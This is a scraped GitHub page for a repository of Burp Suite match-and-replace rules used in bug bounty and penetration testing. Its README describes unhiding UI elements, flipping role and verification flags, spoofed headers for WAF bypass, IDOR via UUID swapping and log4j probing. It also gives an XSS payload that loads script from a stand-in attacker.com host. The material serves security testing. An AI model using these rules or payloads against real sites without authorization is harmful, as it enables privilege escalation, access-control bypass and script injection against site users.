Skip to content

daffainfo/match-replace-burp

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
CONTRIBUTING.md
CONTRIBUTING.md
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
match-replace-burp.json
match-replace-burp.json
 
 

Repository files navigation

Match Replace Burp

Useful Match and Replace BurpSuite Rules

Finding hidden buttons, forms, and other UI elements

Many websites contain hidden buttons, forms, and other UI elements like

<div aria-hidden="true"></div>
<div style="visibility: hidden;"></div>
<div style="display: none;"></div>
<script>document.getElementbyTagName("test").hidden=true</script>
<button type="button" disabled>test</button>
  • Show Hidden UI (1)

  • Show Hidden UI (2)

  • Change disable to enable

Changing false to true

Sometimes we can get hidden features by changing from false to true. The example:

  • Changing role from normal user to admin

  • Make email verified

Bypass WAF

Bypassing WAF by adding some headers

  • Adding X-Forwarded-Host: 127.0.0.1

Create another rule but change the header to:

X-Forwarded-Port: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Origin: null
Origin: Domain.attacker.com

Finding IDOR

By changing original user UUID to another UUID

Create another rule but change the type to "Request First Line"

Finding XSS

By adding some XSS payload into the request

  • Finding XSS on User-Agent

  • Finding XSS on Referer

  • Auto replace user input with XSS payload

So by just inputting the words xss_payload on the website it will be immediately replaced with "><script src=https://attacker.com></script> Change the XSS payload as you want

MISC

Some random match and replace rules

Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere

  • Help companies to identify your traffic and separate them from malicious traffic by adding a custom header

References:

Soon will be updated again

About

Useful "Match and Replace" burpsuite rules

Topics

bugbounty pentest hacktoberfest burpsuite

Resources

Readme

License

MIT license
Activity

Stars

335 stars

Watchers

7 watching

Forks

55 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •